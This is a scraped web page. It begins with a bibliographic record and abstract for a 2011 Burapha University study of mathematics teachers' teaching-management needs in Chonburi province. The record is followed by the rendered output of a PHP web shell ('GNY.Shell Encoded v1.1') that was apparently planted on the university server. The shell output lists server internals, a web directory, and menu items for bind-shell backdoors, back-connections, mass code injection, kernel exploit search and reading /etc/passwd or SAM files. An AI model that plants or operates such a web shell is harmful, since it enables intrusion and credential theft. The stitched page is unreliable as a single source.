การศึกษาสภาพ ปัญหา และความต้องการเพิ่มสมรรถภาพความรู้และการจัดการเรียนรู้ของครูคณิตศาสตร์ จังหวัดชลบุรี ในโรงเรียนสังกัด สำนักงานคณะกรรมการการศึกษาขั้นพื้นฐาน.

Titleการศึกษาสภาพ ปัญหา และความต้องการเพิ่มสมรรถภาพความรู้และการจัดการเรียนรู้ของครูคณิตศาสตร์ จังหวัดชลบุรี ในโรงเรียนสังกัด สำนักงานคณะกรรมการการศึกษาขั้นพื้นฐาน.
Publication TypeResearch
Year of Publication2554
Authorsเวชฤทธิ์ อังกนะภัทรขจร., Vetcharit Angganapattarakajorn.
Institutionมหาวิทยาลัยบูรพา. (Burapha University).
Cityชลบุรี. (Chonburi).
Typeงานวิจัย.
Keywordsการจัดการการเรียนรู้., ความรู้., สาขาการศึกษา.
Abstractการวิจัยครั้งนี้มีวัตถุประสงค์เพื่อศึกษาสภาพ ปัญหา และความต้องการเพิ่มสมรรถภาพความรู้และการจัดการเรียนรู้ของครูคณิตศาสตร์ จังหวัดชลบุรี ในโรงเรียนสังกัดสำนักงานคณะกรรมการการศึกษาขั้นพื้นฐาน และเพื่อเปรียบเทียบสภาพ ปัญหา และความต้องการเพิ่มสมรรถภาพความรู้และการจัดการเรียนรู้ของครูคณิตศาสตร์ จังหวัดชลบุรี ในโรงเรียนสังกัดสำนักงานคณะกรรมการการศึกษาขั้นพื้นฐาน จำแนกตามวุฒิการศึกษา สาขาวิชาที่จบ และประสบการณ์ในการสอน กลุ่มตัวอย่างที่ใช้ในการวิจัยได้แก่ ครูผู้สอนวิชาคณิตศาสตร์ จังหวัดชลบุรี จำนวน 109 คน ในโรงเรียนสังกัดคณะกรรมการการศึกษาขั้นพื้นฐาน จำนวน 15 โรงเรียน เครื่องมือที่ใช้ในการวิจัยได้แก่ แบบสอบถามเรื่องสภาพ ปัญหา และความต้องการเพิ่มสมรรถภาพความรู้และการจัดการเรียนรู้ของครูคณิตศาสตร์ จังหวัดชลบุรี ในโรงเรียนสังกัดสำนักงานคณะกรรมการการศึกษาขั้นพื้นฐานที่ผู้วิจัยสร้างขึ้นโดยมีค่าความเชื่อมั่นเท่ากับ 0.9985 และ แบบสัมภาษณ์เพื่อการศึกษาเชิงลึกเกี่ยวกับสภาพ ปัญหา และความต้องการเพิ่มสมรรถภาพความรู้และการจัดการเรียนรู้ของครูคณิตศาสตร์ ผลการวิจัยพบว่า 1. สภาพการจัดการเรียนรู้ของครูคณิตศาสตร์โดยรวมอยู่ในระดับมาก (-x=3.948) และเมื่อพิจารณาเป็นรายด้าน พบว่า ด้านการเตรียมการสอน การจัดกิจกรรมการเรียนรู้ และการวัดและประเมินผล ครูคณิตศาสตร์มีการปฏิบัติในระดับมากทุกด้าน 2. ปัญหาการจัดการเรียนรู้ของครูคณิตศาสตร์โดยรวมอยู่ในระดับน้อย (-x=2.045) และเมื่อพิจารณาเป็นรายด้าน พบว่า ด้านการเตรียมการสอน การจัดกิจกรรมการเรียนรู้ และการวัดและประเมินผล ครูคณิตศาสตร์มีปัญหาในระดับน้อยทุกด้าน 3. ความต้องการเพิ่มสมรรถภาพความรู้และการจัดการเรียนรู้ของครูคณิตศาสตร์โดยรวมอยู่ในระดับมาก (-x=3.571) และเมื่อพิจาณาเป็นรายด้าน พบว่า ด้านการเตรียมการสอน การจัดกิจกรรมการเรียนรู้ การวัดและประเมินผล และความสามารถในการเป็นครูคณิตศาสตร์ ครูคณิตศาสตร์มีความต้องการเพิ่มสมรรถภาพในระดับมากทุกด้าน ส่วนด้านความรู้ เนื้อหาคณิตศาสตร์ ครูคณิตศาสตร์มีความต้องการเพิ่มสมรรถภาพในระดับปานกลาง 4. ครูคณิตศาสตร์ที่มีวุฒิการศึกษาต่างกันมีสภาพ และปัญหาการจัดการเรียนรู้ไม่แตกต่างกัน และมีความต้องการเพิ่มสมรรถภาพความรู้และการจัดการเรียนรู้แตกต่างกันอย่างมีนัยสำคัญทางสถิติที่ระดับ 0.05 5. ครูคณิตศาสตร์ที่จบสาขาวิชาต่างกันมีสภาพ ปัญหา และความต้องการเพิ่มสมรรถภาพความรู้และการจัดการเรียนรู้ไม่แตกต่างกัน 6. ครูคณิตศาสตร์ที่มีประสบการณ์ในการสอนต่างกันมีสภาพ และปัญหาการจัดการเรียนรู้ไม่แตกต่างกัน แต่มีความต้องการเพิ่มสมรรถภาพความรู้และการจัดการเรียนรู้แตกต่างกันอย่างมีนัยสำคัญทางสถิติที่ระดับ 0.05 This research aims to study of status, problems and need for enhancement of content and teaching management competency of mathematics teachers in Chonburi province under Office of the Basic Education Commission and compare the status, problems and needs for enhancement of content and teaching management competency of mathematics teachers in Chonburi province under Office of the Basic Education Commission as classified by educational degree, area of study and teaching experience of teachers. The sample of the study consisted of 109 mathematics teachers from 15 schools in Chonburi province under Office of the Basic Education Commission. Instruments of this study were interviews and questionnaires with reliability of the questionnaires equal 0.9985. The results revealed that: 1. The status of teaching management of mathematics teachers is at the high level (-x=3.948) and in terms of teaching preparation, learning management and measurement and evaluation founded teaching management of mathematics teachers are at high level. 2. The problems of teaching management of mathematics teachers are at the low level (-x=2.045) and in terms f teaching preparation , learning management and measurement and evaluation founded teaching management of mathematics teachers are at the low level. 3. The need for enhancement of content and teaching management competency of mathematics teachers are at the high level (-x=3.571) and in terms of teaching preparation, learning management, measurement and evaluation and ability to mathematics teachers founded needs for enhancement of content and teaching management competency of mathematics teachers are at high level but in terms of content, needs for enhancement of content and teaching management competency of mathematics teachers are at middle level. 4. The status of teaching management and the problems of teaching management of mathematics teachers who have different degrees of education are not significantly different. But the needs for enhancement of content and teaching management competency of mathematics teachers who have different degrees of education are significantly different at 0.05 level 5. The status of teaching management, the problems of teaching management and the need of enhancement of content and teaching management competency of mathematics teachers who have different area of study are not significantly different. 6. The status of teaching management and the problems of teaching management of mathematics teachers who have different teaching experience are not significantly different. But the needs for enhancement of content and teaching management competency of mathematics teachers who have different teaching experience are significantly different at 0.05 level.
Research Notesงานวิจัยนี้ได้รับทุนการทำวิจัยจาก คณะศึกษาศาสตร์ มหาวิทยาลัยบูรพา ประจำปีงบประมาณ 2554
Alternate TitleA study of status, problems and needs for enhancement of content and teaching management competency of mathematics teachers in Chonburi province under office of the basic education commission.
GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 266.3 GB of 389.83 GB (68.31%)Server IP: 10.32.1.15 - Your IP: 54.82.103.134

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 24.01.2015 12:35:08 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 24.01.2015 12:55:44 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0213 ]:.